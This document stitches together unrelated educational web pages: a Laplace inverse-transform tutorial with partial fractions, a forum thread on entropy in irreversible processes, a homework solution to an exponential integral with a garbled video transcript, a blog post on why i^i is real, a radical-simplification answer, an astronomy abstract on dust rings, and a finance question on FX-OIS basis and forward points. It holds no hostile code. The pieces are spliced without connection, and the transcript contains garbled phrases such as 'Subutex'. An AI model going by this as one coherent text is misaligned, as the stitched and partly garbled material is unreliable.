1. $$\displaystyle F\left( s \right) = \frac{6}{s} - \frac{1}{{s - 8}} + \frac{4}{{s - 3}}$$
2. $$\displaystyle H\left( s \right) = \frac{{19}}{{s + 2}} - \frac{1}{{3s - 5}} + \frac{7}{{{s^5}}}$$
3. $$\displaystyle F\left( s \right) = \frac{{6s}}{{{s^2} + 25}} + \frac{3}{{{s^2} + 25}}$$
4. $$\displaystyle G\left( s \right) = \frac{8}{{3{s^2} + 12}} + \frac{3}{{{s^2} - 49}}$$
Show All Solutions Hide All Solutions
Show Discussion
We’ve always felt that the key to doing inverse transforms is to look at the denominator and try to identify what you’ve got based on that. If there is only one entry in the table that has that particular denominator, the next step is to make sure the numerator is correctly set up for the inverse transform process. If it isn’t, correct it (this is always easy to do) and then take the inverse transform.
If there is more than one entry in the table that has a particular denominator, then the numerators of each will be different, so go up to the numerator and see which one you’ve got. If you need to correct the numerator to get it into the correct form and then take the inverse transform.
So, with this advice in mind let’s see if we can take some inverse transforms.
a $$\displaystyle F\left( s \right) = \frac{6}{s} - \frac{1}{{s - 8}} + \frac{4}{{s - 3}}$$ Show Solution
From the denominator of the first term it looks like the first term is just a constant. The correct numerator for this term is a “1” so we’ll just factor the 6 out before taking the inverse transform. The second term appears to be an exponential with $$a = 8$$ and the numerator is exactly what it needs to be. The third term also appears to be an exponential, only this time $$a = 3$$ and we’ll need to factor the 4 out before taking the inverse transforms.
So, with a little more detail than we’ll usually put into these,
\begin{align*}F\left( s \right) & = 6\,\,\frac{1}{s} - \frac{1}{{s - 8}} + 4\frac{1}{{s - 3}}\\ & f\left( t \right) = 6\left( 1 \right) - {{\bf{e}}^{8t}} + 4\left( {{{\bf{e}}^{3t}}} \right)\\ & = 6 - {{\bf{e}}^{8t}} + 4{{\bf{e}}^{3t}}\end{align*}
b $$\displaystyle H\left( s \right) = \frac{{19}}{{s + 2}} - \frac{1}{{3s - 5}} + \frac{7}{{{s^5}}}$$ Show Solution
The first term in this case looks like an exponential with $$a = - 2$$ and we’ll need to factor out the 19. Be careful with negative signs in these problems, it’s very easy to lose track of them.
The second term almost looks like an exponential, except that it’s got a $$3s$$ instead of just an $$s$$ in the denominator. It is an exponential, but in this case, we’ll need to factor a 3 out of the denominator before taking the inverse transform.
The denominator of the third term appears to be #3 in the table with $$n = 4$$. The numerator however, is not correct for this. There is currently a 7 in the numerator and we need a $$4! = 24$$ in the numerator. This is very easy to fix. Whenever a numerator is off by a multiplicative constant, as in this case, all we need to do is put the constant that we need in the numerator. We will just need to remember to take it back out by dividing by the same constant.
So, let’s first rewrite the transform.
\begin{align*}H\left( s \right) & = \frac{{19}}{{s - \left( { - 2} \right)}} - \frac{1}{{3\left( {s - \frac{5}{3}} \right)}} + \frac{{7\frac{{4!}}{{4!}}}}{{{s^{4 + 1}}}}\\ & = 19\frac{1}{{s - \left( { - 2} \right)}} - \frac{1}{3}\frac{1}{{s - \frac{5}{3}}} + \frac{7}{{4!}}\frac{{4!}}{{{s^{4 + 1}}}}\end{align*}
So, what did we do here? We factored the 19 out of the first term. We factored the 3 out of the denominator of the second term since it can’t be there for the inverse transform and in the third term we factored everything out of the numerator except the 4! since that is the portion that we need in the numerator for the inverse transform process.
Let’s now take the inverse transform.
$h\left( t \right) = 19{{\bf{e}}^{ - 2t}} - \frac{1}{3}{{\bf{e}}^{\frac{{5t}}{3}}} + \frac{7}{{24}}{t^4}$
c $$\displaystyle F\left( s \right) = \frac{{6s}}{{{s^2} + 25}} + \frac{3}{{{s^2} + 25}}$$ Show Solution
In this part we’ve got the same denominator in both terms and our table tells us that we’ve either got #7 or #8. The numerators will tell us which we’ve actually got. The first one has an $$s$$ in the numerator and so this means that the first term must be #8 and we’ll need to factor the 6 out of the numerator in this case. The second term has only a constant in the numerator and so this term must be #7, however, in order for this to be exactly #7 we’ll need to multiply/divide a 5 in the numerator to get it correct for the table.
The transform becomes,
\begin{align*}F\left( s \right) & = 6\frac{s}{{{s^2} + {{\left( 5 \right)}^2}}} + \frac{{3\frac{5}{5}}}{{{s^2} + {{\left( 5 \right)}^2}}}\\ & = 6\frac{s}{{{s^2} + {{\left( 5 \right)}^2}}} + \frac{3}{5}\frac{5}{{{s^2} + {{\left( 5 \right)}^2}}}\end{align*}
Taking the inverse transform gives,
$f\left( t \right) = 6\cos \left( {5t} \right) + \frac{3}{5}\sin \left( {5t} \right)$
d $$\displaystyle G\left( s \right) = \frac{8}{{3{s^2} + 12}} + \frac{3}{{{s^2} - 49}}$$ Show Solution
In this case the first term will be a sine once we factor a 3 out of the denominator, while the second term appears to be a hyperbolic sine (#17). Again, be careful with the difference between these two. Both of the terms will also need to have their numerators fixed up. Here is the transform once we’re done rewriting it.
\begin{align*}G\left( s \right) & = \frac{1}{3}\frac{8}{{{s^2} + 4}} + \frac{3}{{{s^2} - 49}}\\ & = \frac{1}{3}\frac{{\left( 4 \right)\left( 2 \right)}}{{{s^2} + {{\left( 2 \right)}^2}}} + \frac{{3\frac{7}{7}}}{{{s^2} - {{\left( 7 \right)}^2}}}\end{align*}
Notice that in the first term we took advantage of the fact that we could get the 2 in the numerator that we needed by factoring the 8. The inverse transform is then,
$g\left( t \right) = \frac{4}{3}\sin \left( {2t} \right) + \frac{3}{7}\sinh \left( {7t} \right)$
So, probably the best way to identify the transform is by looking at the denominator. If there is more than one possibility use the numerator to identify the correct one. Fix up the numerator if needed to get it into the form needed for the inverse transform process. Finally, take the inverse transform.
Let’s do some slightly harder problems. These are a little more involved than the first set.
Example 2 Find the inverse transform of each of the following.
1. $$\displaystyle F\left( s \right) = \frac{{6s - 5}}{{{s^2} + 7}}$$
2. $$\displaystyle F\left( s \right) = \frac{{1 - 3s}}{{{s^2} + 8s + 21}}$$
3. $$\displaystyle G\left( s \right) = \frac{{3s - 2}}{{2{s^2} - 6s - 2}}$$
4. $$\displaystyle H\left( s \right) = \frac{{s + 7}}{{{s^2} - 3s - 10}}$$
Show All Solutions Hide All Solutions
a $$\displaystyle F\left( s \right) = \frac{{6s - 5}}{{{s^2} + 7}}$$ Show Solution
From the denominator of this one it appears that it is either a sine or a cosine. However, the numerator doesn’t match up to either of these in the table. A cosine wants just an $$s$$ in the numerator with at most a multiplicative constant, while a sine wants only a constant and no $$s$$ in the numerator.
We’ve got both in the numerator. This is easy to fix however. We will just split up the transform into two terms and then do inverse transforms.
\begin{align*}F\left( s \right) & = \frac{{6s}}{{{s^2} + 7}} - \frac{{5\frac{{\sqrt 7 }}{{\sqrt 7 }}}}{{{s^2} + 7}}\\ f\left( t \right) & = 6\cos \left( {\sqrt 7 t} \right) - \frac{5}{{\sqrt 7 }}\sin \left( {\sqrt 7 t} \right)\end{align*}
Do not get too used to always getting the perfect squares in sines and cosines that we saw in the first set of examples. More often than not (at least in my class) they won’t be perfect squares!
b $$\displaystyle F\left( s \right) = \frac{{1 - 3s}}{{{s^2} + 8s + 21}}$$ Show Solution
In this case there are no denominators in our table that look like this. We can however make the denominator look like one of the denominators in the table by completing the square on the denominator. So, let’s do that first.
\begin{align*}{s^2} + 8s + 21 & = {s^2} + 8s + 16 - 16 + 21\\ & = {s^2} + 8s + 16 + 5\\ & = {\left( {s + 4} \right)^2} + 5\end{align*}
Recall that in completing the square you take half the coefficient of the $$s$$, square this, and then add and subtract the result to the polynomial. After doing this the first three terms should factor as a perfect square.
So, the transform can be written as the following.
$F\left( s \right) = \frac{{1 - 3s}}{{{{\left( {s + 4} \right)}^2} + 5}}$
Okay, with this rewrite it looks like we’ve got #19 and/or #20’s from our table of transforms. However, note that in order for it to be a #19 we want just a constant in the numerator and in order to be a #20 we need an $$s – a$$ in the numerator. We’ve got neither of these, so we’ll have to correct the numerator to get it into proper form.
In correcting the numerator always get the $$s – a$$ first. This is the important part. We will also need to be careful of the 3 that sits in front of the $$s$$. One way to take care of this is to break the term into two pieces, factor the 3 out of the second and then fix up the numerator of this term. This will work; however, it will put three terms into our answer and there are really only two terms.
So, we will leave the transform as a single term and correct it as follows,
\begin{align*}F\left( s \right) & = \frac{{1 - 3\left( {s + 4 - 4} \right)}}{{{{\left( {s + 4} \right)}^2} + 5}}\\ & = \frac{{1 - 3\left( {s + 4} \right) + 12}}{{{{\left( {s + 4} \right)}^2} + 5}}\\ & = \frac{{ - 3\left( {s + 4} \right) + 13}}{{{{\left( {s + 4} \right)}^2} + 5}}\end{align*}
We needed an $$s + 4$$ in the numerator, so we put that in. We just needed to make sure and take the 4 back out by subtracting it back out. Also, because of the 3 multiplying the $$s$$ we needed to do all this inside a set of parenthesis. Then we partially multiplied the 3 through the second term and combined the constants. With the transform in this form, we can break it up into two transforms each of which are in the tables and so we can do inverse transforms on them,
\begin{align*}F\left( s \right) & = - 3\frac{{s + 4}}{{{{\left( {s + 4} \right)}^2} + 5}} + \frac{{13\frac{{\sqrt 5 }}{{\sqrt 5 }}}}{{{{\left( {s + 4} \right)}^2} + 5}}\\ f\left( t \right) & = - 3{{\bf{e}}^{ - 4t}}\cos \left( {\sqrt 5 t} \right) + \frac{{13}}{{\sqrt 5 }}{{\bf{e}}^{ - 4t}}\sin \left( {\sqrt 5 t} \right)\end{align*}
c $$\displaystyle G\left( s \right) = \frac{{3s - 2}}{{2{s^2} - 6s - 2}}$$ Show Solution
This one is similar to the last one. We just need to be careful with the completing the square however. The first thing that we should do is factor a 2 out of the denominator, then complete the square. Remember that when completing the square a coefficient of 1 on the $$s^{2}$$ term is needed! So, here’s the work for this transform.
\begin{align*}G\left( s \right) & = \frac{{3s - 2}}{{2\left( {{s^2} - 3s - 1} \right)}}\\ & = \frac{1}{2}\frac{{3s - 2}}{{{s^2} - 3s + \frac{9}{4} - \frac{9}{4} - 1}}\\ & = \frac{1}{2}\frac{{3s - 2}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}\end{align*}
So, it looks like we’ve got #21 and #22 with a corrected numerator. Here’s the work for that and the inverse transform.
\begin{align*}G\left( s \right) & = \frac{1}{2}\frac{{3\left( {s - \frac{3}{2} + \frac{3}{2}} \right) - 2}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}\\ & = \frac{1}{2}\frac{{3\left( {s - \frac{3}{2}} \right) + \frac{5}{2}}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}\\ & = \frac{1}{2}\left( {\frac{{3\left( {s - \frac{3}{2}} \right)}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}} + \frac{{\frac{5}{2}\frac{{\sqrt {13} }}{{\sqrt {13} }}}}{{{{\left( {s - \frac{3}{2}} \right)}^2} - \frac{{13}}{4}}}} \right)\\ g\left( t \right) & = \frac{1}{2}\left( {3{{\bf{e}}^{\frac{{3\,t}}{2}}}\cosh \left( {\frac{{\sqrt {13} }}{2}t} \right) + \frac{5}{{\sqrt {13} }}{{\bf{e}}^{\frac{{3\,t}}{2}}}\sinh \left( {\frac{{\sqrt {13} }}{2}t} \right)} \right)\end{align*}
In correcting the numerator of the second term, notice that I only put in the square root since we already had the “over 2” part of the fraction that we needed in the numerator.
d $$\displaystyle H\left( s \right) = \frac{{s + 7}}{{{s^2} - 3s - 10}}$$ Show Solution
This one appears to be similar to the previous two, but it actually isn’t. The denominators in the previous two couldn’t be easily factored. In this case the denominator does factor and so we need to deal with it differently. Here is the transform with the factored denominator.
$H\left( s \right) = \frac{{s + 7}}{{\left( {s + 2} \right)\left( {s - 5} \right)}}$
The denominator of this transform seems to suggest that we’ve got a couple of exponentials, however in order to be exponentials there can only be a single term in the denominator and no $$s$$’s in the numerator.
To fix this we will need to do partial fractions on this transform. In this case the partial fraction decomposition will be
$H\left( s \right) = \frac{A}{{s + 2}} + \frac{B}{{s - 5}}$
Don’t remember how to do partial fractions? In this example we’ll show you one way of getting the values of the constants and after this example we’ll review how to get the correct form of the partial fraction decomposition.
Okay, so let’s get the constants. There is a method for finding the constants that will always work, however it can lead to more work than is sometimes required. Eventually, we will need that method, however in this case there is an easier way to find the constants.
Regardless of the method used, the first step is to actually add the two terms back up. This gives the following.
$\frac{{s + 7}}{{\left( {s + 2} \right)\left( {s - 5} \right)}} = \frac{{A\left( {s - 5} \right) + B\left( {s + 2} \right)}}{{\left( {s + 2} \right)\left( {s - 5} \right)}}$
Now, this needs to be true for any $$s$$ that we should choose to put in. So, since the denominators are the same we just need to get the numerators equal. Therefore, set the numerators equal.
$s + 7 = A\left( {s - 5} \right) + B\left( {s + 2} \right)$
Again, this must be true for ANY value of $$s$$ that we want to put in. So, let’s take advantage of that. If it must be true for any value of $$s$$ then it must be true for $$s = - 2$$, to pick a value at random. In this case we get,
$5 = A\left( { - 7} \right) + B\left( 0 \right)\hspace{0.25in} \Rightarrow \hspace{0.25in} A = - \frac{5}{7}$
We found $$A$$ by appropriately picking $$s$$. We can $$B$$ in the same way if we chose $$s = 5$$.
$12 = A\left( 0 \right) + B\left( 7 \right)\hspace{0.25in} \Rightarrow \hspace{0.25in}B = \frac{{12}}{7}$
This will not always work, but when it does it will usually simplify the work considerably.
So, with these constants the transform becomes,
$H\left( s \right) = \frac{{ - \frac{5}{7}}}{{s + 2}} + \frac{{\frac{{12}}{7}}}{{s - 5}}$
We can now easily do the inverse transform to get,
$h\left( t \right) = - \frac{5}{7}{{\bf{e}}^{ - 2t}} + \frac{{12}}{7}{{\bf{e}}^{5t}}$
The last part of this example needed partial fractions to get the inverse transform. When we finally get back to differential equations and we start using Laplace transforms to solve them, you will quickly come to understand that partial fractions are a fact of life in these problems. Almost every problem will require partial fractions to one degree or another.
Note that we could have done the last part of this example as we had done the previous two parts. If we had we would have gotten hyperbolic functions. However, recalling the definition of the hyperbolic functions we could have written the result in the form we got from the way we worked our problem. However, most students have a better feel for exponentials than they do for hyperbolic functions and so it’s usually best to just use partial fractions and get the answer in terms of exponentials. It may be a little more work, but it will give a nicer (and easier to work with) form of the answer.
Be warned that in my class I’ve got a rule that if the denominator can be factored with integer coefficients then it must be.
So, let’s remind you how to get the correct partial fraction decomposition. The first step is to factor the denominator as much as possible. Then for each term in the denominator we will use the following table to get a term or terms for our partial fraction decomposition.
Factor in
denominator
Term in partial
fraction decomposition
$$ax + b$$ $$\displaystyle \frac{A}{{ax + b}}$$
$${\left( {ax + b} \right)^k}$$ $$\displaystyle \frac{{{A_1}}}{{ax + b}} + \frac{{{A_2}}}{{{{\left( {ax + b} \right)}^2}}} + \cdots + \frac{{{A_k}}}{{{{\left( {ax + b} \right)}^k}}}$$
$$a{x^2} + bx + c$$ $$\displaystyle \frac{{Ax + B}}{{a{x^2} + bx + c}}$$
$${\left( {a{x^2} + bx + c} \right)^k}$$ $$\displaystyle \frac{{{A_1}x + {B_1}}}{{a{x^2} + bx + c}} + \frac{{{A_2}x + {B_2}}}{{{{\left( {a{x^2} + bx + c} \right)}^2}}} + \cdots + \frac{{{A_k}x + {B_k}}}{{{{\left( {a{x^2} + bx + c} \right)}^k}}}$$
Notice that the first and third cases are really special cases of the second and fourth cases respectively.
So, let’s do a couple more examples to remind you how to do partial fractions.
Example 3 Find the inverse transform of each of the following.
1. $$\displaystyle G\left( s \right) = \frac{{86s - 78}}{{\left( {s + 3} \right)\left( {s - 4} \right)\left( {5s - 1} \right)}}$$
2. $$\displaystyle F\left( s \right) = \frac{{2 - 5s}}{{\left( {s - 6} \right)\left( {{s^2} + 11} \right)}}$$
3. $$\displaystyle G\left( s \right) = \frac{{25}}{{{s^3}\left( {{s^2} + 4s + 5} \right)}}$$
Show All Solutions Hide All Solutions
a $$\displaystyle G\left( s \right) = \frac{{86s - 78}}{{\left( {s + 3} \right)\left( {s - 4} \right)\left( {5s - 1} \right)}}$$ Show Solution
Here’s the partial fraction decomposition for this part.
$G\left( s \right) = \frac{A}{{s + 3}} + \frac{B}{{s - 4}} + \frac{C}{{5s - 1}}$
Now, this time we won’t go into quite the detail as we did in the last example. We are after the numerator of the partial fraction decomposition and this is usually easy enough to do in our heads. Therefore, we will go straight to setting numerators equal.
$86s - 78 = A\left( {s - 4} \right)\left( {5s - 1} \right) + B\left( {s + 3} \right)\left( {5s - 1} \right) + C\left( {s + 3} \right)\left( {s - 4} \right)$
As with the last example, we can easily get the constants by correctly picking values of $$s$$.
\begin{align*} & s = - 3 & - 336 & = A\left( { - 7} \right)\left( { - 16} \right) & \Rightarrow \hspace{0.25in}A & = - 3\\ & s = \frac{1}{5}& - \frac{{304}}{5} & = C\left( {\frac{{16}}{5}} \right)\left( { - \frac{{19}}{5}} \right) & \Rightarrow \hspace{0.25in}C & = 5\\ & s = 4 & 266 & = B\left( 7 \right)\left( {19} \right) & \Rightarrow \hspace{0.25in}B & = 2\end{align*}
So, the partial fraction decomposition for this transform is,
$G\left( s \right) = - \frac{3}{{s + 3}} + \frac{2}{{s - 4}} + \frac{5}{{5s - 1}}$
Now, in order to actually take the inverse transform we will need to factor a 5 out of the denominator of the last term. The corrected transform as well as its inverse transform is.
\begin{align*}G\left( s \right) & = - \frac{3}{{s + 3}} + \frac{2}{{s - 4}} + \frac{1}{{s - \frac{1}{5}}}\\ g\left( t \right) & = - 3{{\bf{e}}^{ - 3t}} + 2{{\bf{e}}^{4t}} + {{\bf{e}}^{\frac{t}{5}}}\end{align*}
b $$\displaystyle F\left( s \right) = \frac{{2 - 5s}}{{\left( {s - 6} \right)\left( {{s^2} + 11} \right)}}$$ Show Solution
So, for the first time we’ve got a quadratic in the denominator. Here’s the decomposition for this part.
$F\left( s \right) = \frac{A}{{s - 6}} + \frac{{Bs + C}}{{{s^2} + 11}}$
Setting numerators equal gives,
$2 - 5s = A\left( {{s^2} + 11} \right) + \left( {Bs + C} \right)\left( {s - 6} \right)$
Okay, in this case we could use $$s = 6$$ to quickly find $$A$$, but that’s all it would give. In this case we will need to go the “long” way around to getting the constants. Note that this way will always work but is sometimes more work than is required.
The “long” way is to completely multiply out the right side and collect like terms.
\begin{align*}2 - 5s & = A\left( {{s^2} + 11} \right) + \left( {Bs + C} \right)\left( {s - 6} \right)\\ & = A{s^2} + 11A + B{s^2} - 6Bs + Cs - 6C\\ & = \left( {A + B} \right){s^2} + \left( { - 6B + C} \right)s + 11A - 6C\end{align*}
In order for these two to be equal the coefficients of the $$s^{2}$$, $$s$$ and the constants must all be equal. So, setting coefficients equal gives the following system of equations that can be solved.
\left. {\begin{aligned} & {s^2}: & A + B & = 0\\ & {s^1}: & - 6B + C & = - 5\\ & {s^0}: & 11A - 6C & = 2\end{aligned}} \right\}\hspace{0.25in} \Rightarrow \hspace{0.25in}A = - \frac{{28}}{{47}},\,\,\,\,B = \frac{{28}}{{47}},\,\,\,\,\,C = - \frac{{67}}{{47}}
Notice that we used $$s^{0}$$ to denote the constants. This is habit on my part and isn’t really required, it’s just what I’m used to doing. Also, the coefficients are fairly messy fractions in this case. Get used to that. They will often be like this when we get back into solving differential equations.
There is a way to make our life a little easier as well with this. Since all of the fractions have a denominator of 47 we’ll factor that out as we plug them back into the decomposition. This will make dealing with them much easier. The partial fraction decomposition is then,
\begin{align*}F\left( s \right) & = \frac{1}{{47}}\left( { - \frac{{28}}{{s - 6}} + \frac{{28s - 67}}{{{s^2} + 11}}} \right)\\ & = \frac{1}{{47}}\left( { - \frac{{28}}{{s - 6}} + \frac{{28s}}{{{s^2} + 11}} - \frac{{67\frac{{\sqrt {11} }}{{\sqrt {11} }}}}{{{s^2} + 11}}} \right)\end{align*}
The inverse transform is then.
$f\left( t \right) = \frac{1}{{47}}\left( { - 28{{\bf{e}}^{6t}} + 28\cos \left( {\sqrt {11} t} \right) - \frac{{67}}{{\sqrt {11} }}\sin \left( {\sqrt {11} t} \right)} \right)$
c $$\displaystyle G\left( s \right) = \frac{{25}}{{{s^3}\left( {{s^2} + 4s + 5} \right)}}$$ Show Solution
With this last part do not get excited about the $$s^{3}$$. We can think of this term as
${s^3} = {\left( {s - 0} \right)^3}$
and it becomes a linear term to a power. So, the partial fraction decomposition is
$G\left( s \right) = \frac{A}{s} + \frac{B}{{{s^2}}} + \frac{C}{{{s^3}}} + \frac{{Ds + E}}{{{s^2} + 4s + 5}}$
Setting numerators equal and multiplying out gives.
\begin{align*}25 & = A{s^2}\left( {{s^2} + 4s + 5} \right) + Bs\left( {{s^2} + 4s + 5} \right) + C\left( {{s^2} + 4s + 5} \right) + \left( {Ds + E} \right){s^3}\\ & = \left( {A + D} \right){s^4} + \left( {4A + B + E} \right){s^3} + \left( {5A + 4B + C} \right){s^2} + \left( {5B + 4C} \right)s + 5C\end{align*}
Setting coefficients equal gives the following system.
\left. {\begin{aligned}& {s^4}: & A + D & = 0\\ & {s^3}: & 4A + B + E & = 0\\ & {s^2}: & 5A + 4B + C & = 0\\ & {s^1}: & 5B + 4C & = 0\\ & {s^0}: & 5C & = 25\end{aligned}} \right\}\hspace{0.25in} \Rightarrow \hspace{0.25in}A = \frac{{11}}{5},B = - 4,C = 5,D = - \frac{{11}}{5},E = - \frac{{24}}{5}
This system looks messy, but it’s easier to solve than it might look. First, we get $$C$$ for free from the last equation. We can then use the fourth equation to find $$B$$. The third equation will then give $$A$$, etc.
When plugging into the decomposition we’ll get everything with a denominator of 5, then factor that out as we did in the previous part in order to make things easier to deal with.
$G\left( s \right) = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25}}{{{s^3}}} - \frac{{11s + 24}}{{{s^2} + 4s + 5}}} \right)$
Note that we also factored a minus sign out of the last two terms. To complete this part we’ll need to complete the square on the later term and fix up a couple of numerators. Here’s that work.
\begin{align*}G\left( s \right) & = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25}}{{{s^3}}} - \frac{{11s + 24}}{{{s^2} + 4s + 5}}} \right)\\ & = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25}}{{{s^3}}} - \frac{{11\left( {s + 2 - 2} \right) + 24}}{{{{\left( {s + 2} \right)}^2} + 1}}} \right)\\ & = \frac{1}{5}\left( {\frac{{11}}{s} - \frac{{20}}{{{s^2}}} + \frac{{25\frac{{2!}}{{2!}}}}{{{s^3}}} - \frac{{11\left( {s + 2} \right)}}{{{{\left( {s + 2} \right)}^2} + 1}} - \frac{2}{{{{\left( {s + 2} \right)}^2} + 1}}} \right)\end{align*}
The inverse transform is then.
$g\left( t \right) = \frac{1}{5}\left( {11 - 20t + \frac{{25}}{2}{t^2} - 11{{\bf{e}}^{ - 2t}}\cos \left( t \right) - 2{{\bf{e}}^{ - 2t}}\sin \left( t \right)} \right)$
So, one final time. Partial fractions are a fact of life when using Laplace transforms to solve differential equations. Make sure that you can deal with them. |
# Irreversible process Entropie-Change/cylinder
1. Apr 10, 2013
### Abigale
Hi,
I have read that for an irreversible process the equation for the entropy is: $$ds>\frac{dQ}{T}$$
But if I regard a cylinder connected to a heatreservoir and want to callculate the entropychange of this cylinder, why can I use the equation: $$ds=\frac{dQ}{T}$$???
THX
2. Apr 10, 2013
### Staff: Mentor
Your inequality applies to the closed system that you are applying the process to. Your second equation is not the entropy change for the material in the cylinder unless the process is reversible, irrespective of the heat reservoir. If you regard the heat reservoir as a system, then the second equation describes its change of entropy, since its temperature is constant and (virtually) uniform, and the heat addition takes place reversibly. The key to inequality vs equality is if the system under consideration is undergoing a reversible change. |
💬 👋 We’re always here. Join our Discord to connect with other students 24/7, any time, night or day.Join Here!
JH
# Evaluate the integral.$\displaystyle \int \frac{e^{2x}}{1 + e^x}\ dx$
## $$e^{x}-\ln \left(1+e^{x}\right)+C$$
#### Topics
Integration Techniques
### Discussion
You must be signed in to discuss.
##### Heather Z.
Oregon State University
##### Samuel H.
University of Nottingham
##### Michael J.
Idaho State University
Lectures
Join Bootcamp
### Video Transcript
Let's try to use a use for this one. Let's take you to be either the ex deal also even X then here. So firstly, for under the use of all, rewrite this. Yeah, So you can see here. That is our to you. So we have you have here one plus you down there. And then we also see this. This is just our do you. So it's already there. So the next step here would be to do polynomial division. So go ahead and do your division here. You could do synthetic if you need to. Quotient is one and then the remainder is minus one. So we write in this form Integrate this and then finally easier use up toe back. Subutex. We could drop the absolute value here since eat of the X Plus one is positive and that's your final answer.
JH
#### Topics
Integration Techniques
Lectures
Join Bootcamp |
# The Most Imaginary Number… is Real!
On the eve of “π Day,” a hush has fallen on the mathematical internet. Everyone is gearing up, getting ready to celebrate the beauty of the transcendental number π. Indeed, π is an amazing number. I have a book coming out in October about the geometric problems of antiquity (Tales of Impossibility: The 2000-Year Quest to Solve the Mathematical Problems of Antiquity, Princeton University Press), and one of the problems—squaring the circle—is all about the nature of π.
However, because it is not yet π Day, I thought I’d introduce you to another number that appears in the book—one that is not as well known but that has a very surprising property. The number is ii; that is, $\sqrt{-1}^{\sqrt{-1}}.$ At a glance, this looks like the most imaginary number possible—an imaginary number raised to an imaginary power. But in fact, as Leonhard Euler pointed out to Christian Goldbach in a 1746 letter, ii is a real number!
Euler proved that for any angle $\theta,$ expressed in radians,
$e^{i\theta}=\cos(\theta)+i \sin(\theta).$
If we take $\theta=\pi/2$ radians (that is, $\theta=90^{\circ}$), then Euler’s formula yields
$e^{i\pi/2}=\cos(\pi/2)+i \sin(\pi/2)=0+i\cdot 1=i.$
Therefore,
$i^{i}=(e^{i\pi/2})^{i}=e^{i\cdot i\pi/2}=e^{-\pi/2}=0.2078795763\ldots,$
which is clearly real! Moreover, like π, ii is a transcendental number (and hence an irrational number). This fact was proved in 1929 by the 23-year-old Russian Aleksander Gelfond.
(Actually, as Euler pointed out, ii does not have a single value; rather, it takes on infinitely many real values. The angle i makes with the real axis can be expressed as $2\pi k+\pi/2$ for any integer k. Thus, using the reasoning above, $i^{i}=e^{-2\pi k-\pi/2}$.)
Happy π Day Eve! ($\pi-1$ Day? $\pi-0.01$ Day?) |
# How do you simplify sqrt3/ sqrt5?
$\frac{\sqrt{15}}{5}$
You just have to multiply both numerator $\left(\sqrt{3}\right)$ and denominator $\left(\sqrt{5}\right)$ with $\sqrt{5}$ to rationalize the form
$\frac{\sqrt{3}}{\sqrt{5}}$ = $\frac{\sqrt{3}}{\sqrt{5}}$ * $\frac{\sqrt{5}}{\sqrt{5}}$
= $\frac{\sqrt{15}}{\sqrt{25}}$ = $\frac{\sqrt{15}}{5}$ |
31st Annual Meeting of the DPS, October 1999
Session 2. Extra-solar Planets: Dwarfs and Disks
Contributed Oral Parallel Session, Monday, October 11, 1999, 9:00-10:00am, Sala Kursaal
## [2.05] Dust Rings in Gas Disks. A model for HR 4796A
H.H. Klahr, D.N.C. Lin, P. Bodenheimer (UCO/Lick Observatory)
Circumstellar dust rings like the one observed around HR4796A are not a fail-proof indicator for the formation of massive planets. This paper presents a kinematical model for such a dusty circumstellar ring. A relatively small perturbation (10%) in the surface density distribution of a gas disk produces via secondary effects a dust ring with sharp edges. A distribution of surface density that locally increases outward can be the effect of a small planet (at R < 70 AU), but also could result from photo-evaporation, from an inhomogeneous initial distribution of mass after infall, or from inhomogeneities in the radial viscous transport of material. Given an assumed gas surface density distribution, the dust distribution is calculated including the effects of sub- and hyper-Keplerian disk rotation due to the radial pressure gradients, the Poynting-Robertson effect, direct radiation pressure and turbulent stirring. We find that dust particles have to be larger than 100 \mu m in radius in order to be gravitationally bound to the system. The observed dust distribution can be explained with a gas density perturbation at 70 AU with an amplitude of 10%. |
# STIR topics: Implied FX-OIS Basis and FX Forward/Swap Pricing
if someone could provide some clarity on the below:
1. What is meant by 'Implied FX-OIS Basis'? For example: "ON JPY trading at parity, 1W implied OIS basis moved 70BP" and "3M Implied OIS basis moved 25 BP to imply -130 BP (3M LIBOR XCCY is +4 )". My attempt: We have Interest rates implied by FX Swap points compared against what the points would be had we used the term OIS rates for the underlying currencies - the difference being some basis swap (would imply an IBOR v OCR swap if I am correct) against which we can measure, lets call them dislocation, in FX swaps points that strip out the forward looking expectations of OCR rates by the market?
2a. A client wants 5y EURUSD FX Forward Points (mid) - what instrument(s) do we observe to derive the points from spot? I am explicitly asking this way as once we establish the relevant instruments to observe, I will then gain an understanding of what drives FX points beyond the simple 'interest differentials'/CIP most examples use that are sub-1y and just observe actual IBOR data to create a rate curve. My attempt below:
With reference to this topic: Calculating Cross Currency basis swaps, I have access to my own Bloomberg/access to FXFA - it would appear we observe direct or inferred IBOR rates in each currency (short-end: published IBOR rates, such as actual 3m LIBOR, or 3m LIBOR derived from listed futures or FRA, long-end: IRS). BBG then shows us the difference between FX Swap Implied from those curves and Actual FX Swaps points - the difference being attributable to the XCCY Basis Swap. So in effect we need 2 of the following 3 to solve for the third: IBOR curves (whether actual or observed from the market), XCCY Basis Curve and Actual FX Swap Points. Correct?
2b. Let's assume we have two currencies with completely identical interest rate term structures, however the basis is very positive - say IBOR+100bp for the non-USD currency. The points should then be negative by virtue of the interest rate premium implies by the XCCY basis swap on the LHS currency (non-USD/USD)? I am trying to gauge how changes in XCCY Basis impact FX Swap points, although they would appear to be mostly driven by IBOR differentials with some spot component, having graphed FX points vs the difference between term swap yields in various currencies. By spot component, I would also also ask that - in an imaginary world where interest rates are exactly the same between two currencies (both current and implied forward), but the spot rate is 10% different between T and T+1 (nothing else changes) - the swap points would also change?.
2c. Let's assume balance sheet constraints and credit concerns are non-existent and 5y EURUSD points are wildly off market from what we have calculated from point 2a above - how do we arbitrage this in practice? I am asking this, as I believe I have structured this line of questioning so that the answer should be via the instruments observed in 2a. There has to be some upper/lower bound to FX points once arbitrage becomes attractive enough.
Thank you!
